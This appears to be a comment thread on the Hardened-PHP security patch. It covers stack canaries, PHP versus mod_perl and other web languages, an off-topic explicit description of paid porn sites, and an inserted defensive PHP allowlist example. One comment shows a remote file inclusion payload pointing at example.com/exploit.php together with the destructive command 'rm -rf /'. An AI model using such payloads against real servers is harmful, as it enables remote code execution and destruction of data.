Hardened PHP
Frank Kreuzbach writes "Yesterday the Hardened-PHP Project announced its existence on the PHP-general mailing list. It is the first public patch for PHP which adds security hardening features. It is meant as a proactive approach to protect servers against known and unknown weaknesses within PHP scripts or the engine itself. It enforces restrictions on include statements, adds canary protection to allocated memory and other internal structures and protects against internal format string vulnerabilities. It has syslog support and logs every attack together with the originating IP."
It's a way to protect against buffer overflows. You put some known data on the stack, and before returning from each function call, make sure that data hasn't been changed. Most buffer overflow exploits work by overwriting part of the stack, and canary protection will detect that the stack has been changed, so the exploit code will not run.
My server
I run http://www.uberhacker.com . This site is dedicated to secure PHP programming. It is better to program secure rather than limit coding abilities. Secure programming allows for a wider range of scripts and security.
Kung-fu comes from China, not Japan.
shrugs.
Hell, people probably can write fast software in PHP... I can't stand the language, myself, so I've never bothered to learn optimization tricks. Mod_perl kicks ass... as Slashdot knows, not to mention Amazon...
Can a PHP devotee who also knows web development from a mod_perl standpoint explain why you like PHP so much? I'm honestly curious. I've modified other people's apps, and find the language both cumbersome to use for non-trivial things and overly low level, at the same time.
I forget what 8 was for.
Not many folks will qualify as knowing both. From my perspective, PHP was stable (MOD_PERL, several years back, was twitchy) and considerably simpler. Remember that to much of the programming world, Perl is weird.
Its advantages: faster (java isn't slow, it has a slow startup, which for a server is hardly a big deal), because the code you write is going to be converted in machine code; scales better (PHP still doesn't provide connection pooling; pconnect doesn't count, btw); more secure (no buffer overflow b/c of java, can use security policies to restrict what your pages are doing)
Its disadvantage: well, you have to learn java. You can't just jump into writing jsp pages, as you'd do with php. But I can equally argue that that's an advantage as well, as it increases the quality of code.
The Raven
Online porn is a huge industry. Think about sites like Hustler.com where you can read back issues of the magazine over the last few years and new issues when they appear on newsstands. They also have most of their full length DVDs available to users. That's all of Hustler's Barely Legal videos as well as all their other stuff. That's a huge amount of high quality content that is difficult to find from free sources.
;)
Then think about sites like ten.com where you can watch literally thousands of full length porn DVDs. That's hundreds of gigabytes of high quality content. The people that run this website get the movies from the cable and satellite networks that they own (exxxtacy, true blue, ten, ten clips etc...). This is the stuff that cable viewers pay $10 a movie to watch on Pay-per-view, so you can see how $20 a month to watch all the movies they want is an attractive price.
Then think about all the niche stuff that is hard to find from free sources. E.g. Max Hardcore, Bukkake, watersports etc. and you will begin to understand how these guys make money. Niche sites are usually more expensive too ($30 - $40 a month). With just 5000 users they make $150,000 - $200,000 a month gross. 5000 perverts aren't that hard to find when you consider that these websites attract users from all over the world.
What the user pays for is access to a large amount of high quality content (e.g. huge library of movies), or niche content. Searching for porn on free sites sucks because it is all disorganized. E.g. 15 photos from site number 1, 12 photos from site number 2; and usually the movies from free sites are too short or low quality. Getting free porn from P2P (kazaa, overnet) is another option but the selection is actually pretty small and finding what you are looking for is not an easy task.
This is how online pay porn sites make money.
I'm not extremely familiar with mod_perl, but I do lots of work in PHP.
The reason I like PHP better than perl for web development is the fact that you can escape in and out of execution (yes, this can be and is often abused) and I like how PHP wraps some of the more unreadable aspects of perl (like extracting arguments, etc) and has nice session support.
Also, PHP seems to have a lot of standard web stuff rolled in by default. I know that you can configure perl to be whatever you want it to be, but back before I had access to my own servers whose environment I could control, this mattered a bit more.
Anyway, just my two cents - it really comes down to personal preference between the two in my opinion - lots of the major distinctions have gone away in the last couple of years.
Turck MMCache dev stopped since the lead dev was taken in by Zend. That doesn't mean development has stopped though! New people have taken it over and are slowly coding new stuff up!
The ones I'm most familiar with are extensions of Common Lisp. There are 3 CL web servers, each with dynamic HTML generation capability (AllegroServe, Araneida, CL-HTTP). Then there's Lisp Server Pages, Active Lisp Pages, etc., and another whole load of CGI solutions. I use (and highly recommend) AllegroServe. There is a whole big list over at Cliki (which runs on Araneida).
There are many CGI bindings for various Scheme implementations, and the PLT web server is kind of popular. I'm not very familiar with Scheme web solutions though, so I probably left something out.
There is a lot of activity with Smalltalk-based web apps. Seaside is a continuation-based framework that gets a lot of attention. There's also AIDA/Web, and an unfinished mod.Smalltalk. I am not very familiar with Smalltalk web solutions either, so I probably missed a few.
Python is a very popular option, and Zope seems to be a very popular framework. I don't know anything about web programming in Python aside from that.
Take pretty much any of the recent lightweight (in the conference meaning of the term) languages, and you're bound to find good options, almost all of them better in terms of security and speed than PHP; I can't think of a single one that has a more annoying syntax or more convoluted and limited semantics than PHP, though. Another thing that you should consider is the website we're posting on is pretty interactive, and kind of popular, and it's written in Perl.
In the great CONS chain of life, you can either be the CAR or be in the CDR.
No, it's far worse than just reading "/etc/passwd", you could say "action=http://example.com/exploit.php", and PHP will happily (yet stupidly) execute the contents of "exploit.php", whatever that might be (say, "system('rm -rf /');" perhaps?).
Because PHP was written with security as a distant afterthought.
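One way to close the hole described in the comment above, where a request parameter such as `action=http://example.com/exploit.php` reaches an include statement: use the parameter only as a key into a fixed allowlist, and log each rejection with the client address. This is an added example, not code from the thread or from the Hardened-PHP patch; the page names, the `pages/` directory and the sample client address are assumptions.

```php
<?php
// Added example: allowlist dispatch instead of include($_GET['action']).
// Page names and the pages/ directory are hypothetical.

const PAGES = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/**
 * Map a request parameter to a local file, or return null.
 * The user's string is only ever used as an array key, never as a path,
 * so URLs and "../" sequences cannot influence what gets included.
 */
function resolve_page(string $action, string $baseDir): ?string
{
    if (!array_key_exists($action, PAGES)) {
        return null;
    }
    return rtrim($baseDir, '/') . '/' . PAGES[$action];
}

function log_rejected(string $action, string $ip): void
{
    // Truncate and strip control characters so the value cannot forge log lines.
    $safe = preg_replace('/[\x00-\x1f\x7f]/', '?', substr($action, 0, 200));
    syslog(LOG_WARNING, "rejected include target '$safe' from $ip");
}

// Constructed inputs: a legitimate page, the URL from the comment, a traversal.
$samples = ['news', 'http://example.com/exploit.php', '../../etc/passwd'];
foreach ($samples as $action) {
    $file = resolve_page($action, __DIR__ . '/pages');
    if ($file === null) {
        log_rejected($action, '192.0.2.10'); // constructed client address
        echo "DENY  $action\n";
        continue;
    }
    // A real front controller would run `require $file;` at this point.
    echo "ALLOW $action -> $file\n";
}
```

Setting `allow_url_include = Off` in php.ini (the default since PHP 5.2) blocks the URL case at the engine level, but it does not stop local path traversal, which the allowlist does.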
Projects like Mason or Embperl accomplish that same functionality of including executable code inside special tags, e.g. "" or "<%...%>", but you also harness all the power of mod_perl at the same time.
Mason and Embperl are complete systems built on top of mod_perl, so it's a whole new architecture separate from regular mod_perl.
There is a 2.4.7-dev version from CVS that works quite well with PHP5!
I don't think its future is in doubt at all, just that the insane pace it was developed at has slowed a little bit.